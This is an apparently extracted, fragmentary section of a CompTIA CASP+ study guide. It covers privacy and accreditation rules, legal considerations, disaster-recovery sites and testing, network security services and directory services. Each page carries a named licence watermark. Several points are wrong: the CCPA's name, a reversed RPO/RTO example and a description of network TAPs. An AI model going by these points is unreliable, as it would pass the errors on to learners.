38 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
The United States does not have a federal data privacy law but individual states are
beginning to establish their own laws, such as the California Consumer Protection Act
(CCPA).
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 39
Certification and accreditation (C&A) take on a new meaning within the U.S.
federal government. The U.S. federal government uses a very stringent process
in order to provide assurance that all agency information systems are compliant
with federal standards. U.S. federal certification and accreditation is a massive
undertaking and, as a result, requires extensive skills and experience to successfully
complete.
The certification and accreditation (C&A) process includes four distinct phases:
• Initiation and Planning
• Certification
• Accreditation
• Continuous Monitoring
Certification
To obtain certification, an independent audit will review the information system and
associated documentation in order to identify if the necessary controls outlined in
NIST special publication (SP) 800-53 have been implemented.
Accreditation
To obtain accreditation, a special entity called the Certifying Authority will also
review the information system and the results of the independent audit. After the
Certifying Authority reviews all necessary elements of the system and determines
that the system is compliant with all requirements, a formal letter of accreditation
will be provided to the system owner that grants the Authority to Operate (ATO)
the system for a period of three years.
Continuous Monitoring
Continuous monitoring describes the actions taken to ensure that a system
continues to operate in a compliant way. The information system security officer
(ISSO) has primary responsibility for this important phase and utilizes many
administrative, technical, and physical controls to maintain assurances.
It is common for the certification and accreditation process to include
measurements and metrics detailed in the ISO standard 15408 - Common Criteria
(CC) for Information Technology Security Evaluation, which allows the security
attributes of a system to be specifically detailed using a common vernacular.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
40 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Regulation, Accreditation,
and Standards
7
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 41
Topic 2C
Explain Legal Considerations
& Contract Types
6
Legal Jurisdiction
Understanding legal jurisdiction is important when considering legal risk. The
following lists the various jurisdictions that play a part in understanding legal
compliance.
• Federal Laws
• Federal Regulations
• State Laws
• International Law
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
42 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
It is typically best to report an incident to the local jurisdiction first, local law
enforcement will involve other agencies from other jurisdictions as necessary.
Due Diligence
When considering due diligence, it is important to keep in mind that “reasonable
and expected” protections constantly evolve. Many of the protections that were
widely regarded as sufficient just a few years ago are not considered adequate by
today’s measure. The protections in use today will fall out of favor in the future.
To this end, due diligence describes the ongoing and documented effort to
continuously evaluate and improve the mechanisms by which assets are protected.
e-Discovery
e-Discovery describes the electronic component of identifying, collecting, and
providing the electronically stored information (ESI) identified by a legal hold. The
scope of information included in e-Discovery can be vast and include everything
from files, emails, logs, text messages, voicemail, databases, and social media
activity. The scope of information requested in an e-Discovery request can be
difficult for many organizations to comply with. For organizations that are involved
in regular legal activities, generally large organizations and government, specific
strategies are often employed to defend against e-Discovery requests. Defenses
often include well-crafted data retention policies that define stringent periods for
which data can be retained. However, data retention polices cannot conflict with
existing laws that dictate retention periods.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 43
Wassenaar Arrangement
The Wassenaar Arrangement was established in 1996 and defines export controls
for “conventional arms and dual-use goods and technologies.” The arrangement
includes 42 participating states and generally defines controls crafted to prevent
a destabilizing accumulation of weaponry by any single nation and to prevent
advanced weaponry and military capabilities from being acquired by terrorist
factions.
Encryption Laws
The legal standing of encryption varies widely across the world. Some countries do
not constrain the use of encryption, whereas others impose very strict limitations.
An excellent resource that highlights the legal stance of countries around the world
can be accessed via: https://www.gp-digital.org/world-map-of-encryption/
Technologies commonly used in the United States, such as VPN, may employ encryption
techniques that violate laws in other countries.It is important to understand encryption
laws in destinations where an organization's staff and employees may travel to.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
44 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 45
Review Activity:
Legal Considerations & Contract Types
7
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
46 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Lesson 2
Summary
6
Key Takeaways
• Data must be analyzed and classified based on its sensitivity and value.
• More and more privacy laws are being introduced and can have severe
consequences for non-compliance.
• Encryption laws vary from country to country, and some encryption technologies
are subject to export restrictions.
Practice Questions: Additional practice questions are available on the CompTIA Learning
Center.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 3
Implementing Business Continuity
& Disaster Recovery
1
LESSON INTRODUCTION
Business Continuity and Disaster Recovery (BCDR) plans are critically important to
establish but also complicated and time-consuming to test and maintain. Senior
leadership participation and oversight into the ongoing upkeep of these important
plans is essential. In this lesson, we will describe the important components of BCDR
planning and testing.
Lesson Objectives
In this lesson, you will:
• Understand the role of Business Impact Analysis.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
48 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 3A
Explain the Role of Business
Impact Analysis
2
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 49
disaster, when things are their most frantic and pressing, and is focused on the
tasks required to bring critical systems back online.
Sometimes the simplest things can have massive impacts. It can be practically impossible
to identify these things without understanding how the organization operates.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
50 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
It is possible to meet the recovery point objective, by successfully bringing systems back
online within the defined timespan, but fail the recovery time objective by recovering
those systems from backups that do not contain data within the recovery point objective.
For example, employees could successfully access the restored system but identify that
too much data is missing.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 51
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
52 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Business Continuity & Disaster
3
Recovery
Answer the following questions:
4. This generally defines the amount of data that can be lost without
irreparable harm to the operation of the business.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 53
Topic 3B
Assess Disaster Recovery Plans
6
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
54 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Cold Site
A cold site is one that requires the least amount of maintenance. In the most
general sense, a cold site is simply a facility that is under the organization’s control
but does not have any pre-established information system capability. It is literally
a site that has electricity but no computer equipment, perhaps not even any
furniture, but it is open and available for use. A cold site has the lowest operating
expense and complexity at the cost of activation time—a cold site will take weeks
to activate as all the equipment must be acquired and provisioned before it can
be used.
Warm Site
A warm site is a very common implementation. A warm site includes a datacenter
that is typically scaled-down from the primary site to include the capacity and
throughput needed to run critical systems and software. In addition, systems are
pre-configured and mostly ready to operate when needed although a measured
amount of re-configuration and preparation is needed in order for them to be
ready to operate in place of the primary site. A warm site is expensive to operate
and complicated to maintain but the benefits are realized upon activation which can
take hours to perhaps a few days to accomplish.
Hot Site
A hot site is, in many ways, the ultimate goal of a DR site. A hot site is one that can
be activated and used within minutes. To be able to implement a DR site that can
operate in this way takes very specialized knowledge, sophisticated automation
capabilities, and platforms that are specifically designed to operate in this manner,
which is not common. A hot site is by far the most expensive and complicated
option to implement but results in close to real time activation with little to no
service disruption.
Mobile Site
A mobile site can be described as a data center in a box, albeit a large box! A mobile
site is typically acquired through an agreement with a mobile site operator who can
deliver the modular data center to the necessary location, at which point services
can be enabled on the equipment located within the mobile structure. This type of
approach falls somewhere between a cold and warm site, with moderate costs and
activation times spanning days to weeks.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 55
be activated on the cloud platform for the duration necessary until they can be
transitioned back to the primary site.
This approach is different than the idea of simply using the public cloud as a BCDR
solution! Many organizations point to the use of cloud as the basis of the continuity
strategy, but cloud service providers experience outages and disasters in the same
way as other organizations do. A BCDR plan still needs to be in place to mitigate the
impacts of a cloud service provider outage.
In March of 2021, a cloud service provider suffered a catastrophic fire at one of its
datacenters located in Strasbourg, France. The fire completely destroyed the facility and
customers were advised to “activate their data recovery plans.”
• Information Assurance
• IT Support
• Legal Department
• Human Resources
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
56 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
NIST SP 800-84 “Guide to Test, Training, and Exercise Programs for IT Plans and
Capabilities” includes an after action report template and includes the following
sections:
• Introduction/Description
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 57
Review Activity:
7
Disaster Recovery Planning
Answer the following questions:
3. This type of site is one that can be activated and used within minutes.
4. This term describes when cloud service offerings are used for DR
capabilities.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
58 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 3C
Explain Testing and Readiness
Activities
6
After all the analysis is done and the BCDR plan is finally established, the plans
MUST be put to the test. Careful analysis and planning are imperative in order to
provide the best opportunity for successful recovery capabilities, but it is not until
the plan is tested that it can be truly verified as effective. When performing the
tests, it should be assumed that something has been missed or overlooked in the
plans and that the objective of testing it to locate the oversights!
The only way to know recovery can be performed is to try. It is better to find out things
don’t work during a test than during a real emergency.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 59
• SOX—Sarbanes-Oxley Act
• GLBA—Gramm-Leach-Bliley Act
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
60 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Walk-Through
A walk-through requires all groups included in the BCDR plan to identify a
representative to participate in a meeting to review the plans and analyze their
effectiveness against various BCDR scenarios.
Tabletop Exercise
It is very common for a tabletop exercise (TTX) to include senior leadership but
sometimes might be focused on the capabilities of a single department or branch
location. The tabletop exercise is designed to evaluate the procedures in place for
responding to an incident. The tabletop exercise will identify a specific objective
or goal and then use it to determine whether all parties involved in the response
know what to do and how to work together to complete the exercise. A tabletop
exercise is frequently led by a person or group that will describe an imaginary event
to which the team must respond. During the course of the response, the person or
group leading the exercise will expand on the scenario by adding new details, or an
additional event/consequence which the participating teams must adapt to.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 61
Review Activity:
Testing and Readiness Activities
7
2. True or False. BCDR plans should not be tested as doing so may break
production systems.
3. Which type of simulation test includes a meeting to review the plans and
analyze their effectiveness against various BCDR scenarios?
5. When performing this type of test, issues and/or mistakes could cause a
true DR situation:
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
62 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Lesson 3
Summary
6
Business Continuity and Disaster Recovery require careful planning and should be
driven from the highest levels of organizational leadership. Understanding how an
organization operates, as well as the legal and regulatory requirements governing
operations, has a direct impact on the design and required capabilities incorporated
into a BCDR plan.
Alternate sites have been a traditional component in DR plans for many years, but
this is changing as more and more organizations shift their infrastructure to cloud
platforms. Running in the cloud does not remove the requirements for alternate
sites, but establishing alternate sites may be easier when running in the cloud.
Key Takeaways
• Identifying critical assets requires feedback from business units.
• Running in the cloud does not remove the need for alternate sites.
• BCDR plans must be tested often to verify they are accurate and that staff know
what to do.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 4
Identifying Infrastructure Services
1
LESSON INTRODUCTION
Information technology infrastructure is rapidly evolving, and the boundaries
between software and hardware are becoming increasingly difficult to identify.
In this lesson, we will explore both traditional infrastructure and the software
and cloud-based counterparts that are rapidly replacing them.
Lesson Objectives
In this lesson, you will:
• Understand critical protective technologies and tools.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
64 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 4A
Explain Critical Network Services
2
This topic will explore some technologies and tools that are likely very familiar
as they are time-tested components of any security teamʼs arsenal. In addition
to these familiar tools, consideration will be made for the evolution of enterprise
architecture and the shifts in usage that require new approaches to incorporating
defenses and the use of new tools to protect hardware, software, and services.
Firewall
Firewalls provide a foundational level of protection for any network by blocking
or allowing traffic based on a set of pre-configured rules. In order to filter traffic,
firewall rules are crafted to inspect traffic protocols, IP addressees, and ports. A
traditional firewall provides a high level of protection by limiting protocols and
restricting traffic flows, but a traditional firewall does not provide visibility into
high-level protocols, such as HTTP. The result is that while traditional firewalls may
be quite effective at limiting traffic destined to a web server, for example, it has no
impact on the content of the traffic. Ordinary web traffic and malicious web traffic
are ultimately both simply web traffic, and a traditional firewall will allow both to
pass as it is designed to only inspect protocol type, IP addresses, and ports.
Routers
Routers forward traffic between subnets by inspecting IP addresses and so
operate at layer 3 of the OSI model. Routers serve a foundational role in a network
architecture by allowing or denying traffic to flow between segments based
on how the routing table is configured and also, more explicitly, through the
implementation of access control lists, or ACLs, to restrict traffic between subnets.
Routers can be standalone equipment but also, and very commonly, defined as
virtual machines on a virtual platform or in a public cloud.
Load Balancer
Load balancers are generally associated with the management of web traffic.
Generally, a load balancer is a special purpose device, or appliance, containing
specialized software allowing the configuration of traffic management rules. Load
balancers, like many other devices, can also be implemented as virtual machines
while still offering the same features and services as their hardware counterparts.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 65
A load balancer is placed in-line of the traffic destined for a web application. The
web traffic is inspected by the load balancer and then sent to one of several web
servers (all of which host a copy of the web application) based on matching the
traffic to a pre-configured rule or profile. A common implementation of load
balancers is to distribute traffic among one of many web servers to better handle
high-volume workloads. Another common implementation is for fault tolerance,
whereby the load balancer is able to determine if a particular web server in a group
is inoperable so that traffic can be re-directed automatically to a different server,
avoiding an outage.
Internet Gateway
In a cloud environment, the Internet Gateway is a Virtual Private Cloud component
used to allow communication between the VPC and the Internet.The VPC contains
routing tables that define Internet-routable traffic and performs NAT for virtual
instances that are assigned public addresses.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
66 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Mail Security
Email remains one of the biggest sources of attack within an organization. Aside
from internal use, an email server (by design) is configured to receive messages
from anyone located anywhere on the Internet, which is a risky proposition by
itself. Furthermore, email provides direct access to staff and employees so is an
incredibly useful tool for attackers when performing social engineering attacks.
Implementing email protections at the point of input from the internet is vital. Many
vendor-supported email security devices and services exist in the marketplace.
Implementing mechanisms to inspect and protect email typically require purchasing
and installing a physical device or virtual appliance, configured to inspect all
inbound and outbound traffic, or subscribing to an email screening service and
changing DNS MX records to direct all email to the service provider's systems for
inspection prior to delivery.
Securing email can include a wide array of approaches, including the use of
blocklists of known bad senders, inspecting attachments, scanning for keywords
within the subject and body of a message, and the use of more advanced
techniques leveraging behavioral and heuristic analyses of mail content and
messaging activity.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 67
Forward/Transparent Proxy
A forward proxy provides for protocol-specific outbound traffic. For example, you
might deploy a web proxy that enables client computers on the LAN to connect to
websites and secure websites on the Internet.
The main benefit of a proxy is that client computers connect to a specified point
on the perimeter network for web access. The proxy can be positioned within a
DMZ. This provides for a degree of traffic management and security. In addition,
most web proxy servers provide caching engines, whereby frequently requested
web pages are retained on the proxy, negating the need to re-fetch those pages for
subsequent requests.
A proxy server must understand the application it is servicing. For example, a
web proxy must be able to parse and modify HTTP and HTTPS commands (and
potentially HTML and scripts too). Some proxy servers are application-specific;
others are multipurpose. A multipurpose proxy is one configured with filters for
multiple protocol types, such as HTTP, FTP, and SMTP.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
68 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
A proxy autoconfiguration (PAC) script allows a client to configure proxy settings without
user intervention. The Web Proxy Autodiscovery (WPAD) protocol allows browsers to
locate a PAC file. This can be an attack vector, as a malicious proxy on the local network
can be used to obtain the user's hash as the browser tries to authenticate (nopsec.com/
responder-beyond-wpad).
Reverse Proxy
A reverse proxy is a system put in-line of traffic destined to a specific host or group
of hosts. The reverse proxy can inspect traffic, distribute traffic among many
systems, cache content in order to improve performance, and/or perform traffic
encryption. One way to describe a reverse proxy is that it is in-line of traffic from
the “outside-in,” meaning traffic originating from the Internet hits the reverse
proxy before reaching the intended service. A simple reverse proxy is often used to
improve performance by caching web content or working in a similar manner as a
load balancer.
Load Balancer
Servers
WAN/Internet
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 69
• Host-based—Software that runs on the same host as the web application server.
It is inexpensive to acquire and maintain but complicates the configuration of
the web application and can require considerable computational resources. A
very popular and widely implemented host-based WAF is ModSecurity, which
is Apache licensed free software and compatible with a wide variety of platforms.
API Gateway
An API gateway provides a mechanism allowing software interfaces to be detached
from the main application. In a similar way that a WAF can offload the inspection
and protection of web traffic, an API gateway can be used to offload the inspection
and protection of data interface traffic. API gateways are common to cloud
platforms and provide high levels of extensibility, allowing the API gateway to also
handle authentication, traffic management, monitoring, and a variety of other tasks.
When it is necessary to simply expose an API service externally, such as to the
internet, an eXtensible Markup Language (XML) gateway may be more applicable
as it can isolate the service and allow processing and firewall-like inspection of the
traffic. An XML Gateway does not offer the same extensibility as an API Gateway but
offers similar protections.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
70 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
To extend traditional DNS with DNSSEC functionality, the authoritative DNS server
for a zone must create a “package” of resource records called a Resource Record
Set (RRset) digitally signed using its Zone Signing Key. When another DNS server
requests a secure record exchange, the authoritative server returns the package
or resource records along with its public key, which can then be used by the
requesting server to verify the digital signature used to protect the records.
The zone signing key is also signed using a Key Signing Key. Separately signing
the zone signing key is important so that if the zone signing key is somehow
compromised, it can be revoked and re-established.
• L2TP/IPSec
• IKEv2/IPSec
• WireGuard
• SSTP
• IPSec
• PPTP
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 71
Defining policy violations in Packet Fence Open Source NAC. (Screenshot used with permission
from packetfence.org.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
72 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Packet Fence supports the use of several scanning techniques, including vulnerability scanners, such
as Nessus and OpenVAS, Windows Management Instrumentation (WMI) queries, and log parsers.
(Screenshot used with permission from packetfence.org.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 73
NIDS are essential for providing early warning of suspicious activity by analyzing
enormous volumes of network traffic, in near real-time, which would be a practically
impossible task by any other means. To accomplish this, NIDS are typically deployed
using a NIDS Server and several NIDS Sensors. The NIDS Server is capable of
high-volume work and contains many processors, a high amount of RAM, and lots
of storage. Sensors placed throughout an enterprise collect and forward network
traffic to the NIDS Server so that it can be analyzed in real-time and also archived
for more detailed inspection at a later time if warranted.
Traffic Mirroring
The type of packet and protocol analysis formed by NIDS depends upon a sniffer
tool to capture and decode traffic. Capturing from a network segment can be
performed by configuring a switched port analyzer (SPAN) or port mirroring. This
means that a network switch is configured to copy frames passing over designated
source ports to the destination port to which the packet sniffer is connected.
Sniffing can also be performed over a network cable segment by using a test
access port (TAP). A TAP is the preferred mechanism for performing traffic capture
as it leverages special expansion ports on the switch and does not cause a negative
performance impact to switch performance.
Traffic mirroring can also be performed for virtual private clouds. VPC traffic
mirroring is a feature available on cloud platforms designed to allow traffic to be
forwarded and inspected in a similar way as is accomplished within traditional
infrastructures.
A wireless intrusion detection system (WIDS) is designed to monitor the wireless
signal spectrum in order to detect unauthorized access points, or rogue access
points, as well as any indication of the use of wireless attack mechanisms. Some of
the threats a WIPS can identify include
• Unauthorized/rogue access points and evil twins
• Ad hoc networks
• On-path attacks
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
74 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
particular environment. NIPS false positives have a much more harmful impact as a
false positive alert will result in blocking legitimate traffic, reducing availability.
Similarly, a wireless intrusion prevention system is used to identify and block
identified suspicious activity contained within a wireless network.
If SNMP is not used, its configuration should be changed as SNMP is often enabled
by default on many devices. The default configuration password should be changed
and SNMP should be disabled, if possible, on any SNMP-capable devices that you
add to the network. Avoid using SNMP v1 or v2 devices, if possible. If SNMP v1 or v2
is being used, consider the following:
• SNMP community names are sent in plaintext and so should not be transmitted
over the network if there is any risk that traffic could be intercepted.
• Use difficult to guess SNMP community names; do not use default or blank
community names.
• Use Access Control Lists to restrict management operations to known hosts only.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 75
hash of the userʼs passphrase. The agent can verify the signature and authenticate
the user using its own record of the passphrase.
NetFlow
NetFlow and sFlow are both protocols that collect network traffic data for use in
analysis. In a NetFlow system, packets in a transmission are aggregated into a flow,
and then exported for processing. A different system then receives the flow data
and performs analysis on the flow, making determinations about the flow based on
information such as source and destination addresses, source and destination ports,
protocols used, and more. The sFlow protocol is similar to NetFlow but, despite
its name, is not a "true" flow protocol as it does not aggregate packets into flows.
Instead, it performs a sampling of network packets (e.g., 1 in every 100 packets
may be sampled) for an approximate representation of network traffic flows. The
sampled packets are sent as datagrams to a server that stores and analyzes the data.
NetFlow has better vendor support and is generally more useful for security
analysis, as the sampled packets in sFlow don't always provide the comprehensive
picture of events that are needed to identify and analyze a breach.
Antivirus
Early generation antivirus software is characterized by signature-based detection
and prevention of known viruses, worms, trojan-horses, rootkits, and other
malware. Antivirus products now form part of an endpoint detection and response
(EDR) strategy as antivirus alone is often insufficient for the identification and
prevention of many host infection methods.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
76 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
SIEM Capabilities
A typical SIEM provides several unique capabilities.
Capability Description
Aggregation Collect event and log data from multiple disparate systems and
provide a single view from which to process all of the collected
data.
Correlation The ability to link events across the entire enterprise architecture
to form a more complete picture of important events.
Alerting SIEM can be configured to perform automated analysis of event
data and generate alerts to notify analysts of specific conditions
or event types.
Visibility SIEM typically provides dashboard-style views, enabling a single,
simplified view for observing critical activity.
Compliance SIEM facilities compliance by producing activity reports designed
to meet governance and auditing requirements.
Data retention SIEM platforms have the capability to store historical data which
is critical for deep event analysis, digital forensics, data retention,
and compliance requirements.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 77
Review Activity:
3
Critical Network Services
Answer the following questions:
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
78 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 4B
Explain Defensible Network Design
6
Having the defensive capabilities and being able to effectively identify and defend
against cyberattacks requires the careful planning and design focused not only
on functionality but also security needs and requirements. Implementing highly
scalable and reliable infrastructures is only part of the solution as these same
infrastructures need to be crafted to handle attacks in a way that allows for quick
remediation and no unintended downtime.
This topic will explore some of the design features and platforms available when
building durable and secure infrastructures.
Screened Subnet
A screened subnet uses two firewalls placed on either side of the DMZ. The edge
firewall restricts traffic on the external/public interface and allows permitted traffic
to the hosts in the DMZ. The edge firewall can be referred to as the screening
firewall or router. The internal firewall filters communications between hosts in the
DMZ and hosts on the LAN. This firewall is often described as the choke firewall. A
choke point is a purposefully narrow gateway that facilitates better access control
and easier monitoring.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 79
Staging Environments
Staging environments are a mirror of the production environment often used
to test changes to infrastructure, software, and/or data. In some organizations,
staging environments are used as a mechanism to implement wide scale updates
and changes. When properly designed and implemented, staging environments
can be used to hold all required changes and upgrades, and when it is time to
activate these changes in the production environment, the staging environment is
“converted” to production and the former production environment is taken offline,
often sitting in standby in case a rollback of the changes is needed.
Guest Environments
Guest environments describe the hosts and networks available for use by
visitors, such as the public or vendors. If a guest network is required, it should
be completely isolated from any other networks. The guest environment should
provide the absolute minimum amount of required services, and no networks
within the organization should be accessible from the guest network. In addition,
preventing hosts in the guest environment from communicating with each other,
via host-isolation, as well as additional provisions on shared hosts to remove any
remnants of previous use, such as files stored in the file system, temp data, browser
cache, etc., should be implemented. For example, it is best to use a non-persistent
operating system configuration for shared hosts, such as public access computers
and kiosks, located in a guest environment.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
80 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Peer-to-Peer
Peer-to-Peer networks are decentralized networks, meaning that the participating
nodes self-organize in order to provide the types of services typically associated
with client-server networks. Peer-to-Peer networks are used to solve many types
of problems as a result of eliminating the central control of a server. Peer-to-
Peer networks, or P2P, are closely associated with providing anonymity due to
the fact that they do not utilize a central authority, such as is required in a client
server model. Peer-to-Peer networks have a wide variety of applications, from the
distribution of files (often times in violation of copyrights), anonymous network
access (such as TOR), and recently for the distribution of software updates for
Windows 10 client computers.
Air Gap
An air gapped host is one that is not physically connected to any network. Such a
host would also normally have stringent physical access controls, such as housing it
within a secure enclosure, and validating any media devices connected to it.
An air gap provides an empty area surrounding a high-value asset that is closely
monitored for intrusions. As well as being disconnected from any network, the
physical space surrounding the host makes it easier to detect unauthorized
attempts to approach the asset.
Jump Box
A jump box is a specially configured, highly hardened, and closely monitored
system used to perform administrative tasks or to access servers located within an
environment. Instead of allowing administrative tasks to be performed from any
location, a jump box must be used instead. Implementing a jump box prevents
administrative accounts from being abused as they can only be used from the jump
box which is highly secured and closely monitored.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 81
NAC Lists
In a cloud environment, NAC Lists (or “nackles”) are used to control inbound and
outbound traffic between networks, or more specifically between VPCs. NAC Lists
are stateless, meaning both inbound and outbound traffic flows must be explicitly
defined. This characteristic allows for very granular control but must be manually
provisioned as cloud platforms will generally apply default NACLs with very
permissive configurations.
Policies/Security Groups
Security groups (SG) are associated with individual instances and act as virtual
firewalls limiting inbound and outbound traffic. Security groups and NACLs work
together to create granular protections. An NACL can be configured to define the
traffic flows into a VPC, and then the instances within the VPC can be assigned to
SGs that further limit traffic. It is common for SGs and NACLs to contain the same
configuration settings. Typically, instances assigned to the same default SG can
communicate with each other, but a custom SG can be created and assigned to the
instances to block this capability.
Regions
Regions describe the physical location of data centers in a globally distributed
cloud. The region describes a collection of data centers located within a geographic
area and are located across the globe. Regions are sub-divided into availability
zones which generally represent individual data centers within the Region.
• Amazon Web Services Regions are viewable here:
https://aws.amazon.com/about-aws/global-infrastructure/regions_az/
• Microsoft Azure Geographies are viewable here:
https://azure.microsoft.com/en-us/global-infrastructure/geographies/
Data Zones
Data zones describe the state and location of data to help isolate and protect it
from unauthorized/inappropriate use-for example, as data transitions from raw
storage, processing, production, and analytical use. Data zones are associated with
data lakes and designed to help manage big data used by analysts and scientists for
data exploration and discovery tasks.
Some common zones defined in a data lake include:
• Raw Zone—Contains data from multiple sources.
Data zones provide clear boundaries between data types in a data lake so that
quality data can be accessed while new data sources are continuously ingested.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
82 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 83
Directory Services
Directory services are the principal means of providing privilege management
and authorization on an enterprise network, storing information about users,
computers, security groups/roles, and services. A directory is like a database, where
an object is like a record, and things that you know about the object (attributes)
are like fields. In order for products from different vendors to be interoperable,
most directories are based on the same standard. The Lightweight Directory
Access Protocol (LDAP) is a protocol widely used to query and update X.500 format
directories.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
84 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
A distinguished name (DN) is a unique identifier for any given resource within an
X.500-like directory. A distinguished name is made up of attribute-value pairs,
separated by commas. The most specific attribute is listed first, and successive
attributes become progressively broader. This most specific attribute is also
referred to as the relative distinguished name, as it uniquely identifies the object
within the context of successive (parent) attribute values.
The types of attributes, what information they contain, and the way object types are
defined through attributes (some of which may be required, and some optional)
is described by the directory schema. Some of the attributes commonly used
include common name (CN), organizational unit (OU), organization (O), country (C),
and domain component (DC). For example, the distinguished name of a user Jane
located at the Utah office of the marketing department at the company Widget in
the US might be:
CN=Jane, OU=Marketing, O=Utah, C=US, DC=Widget, DC=com
Federation
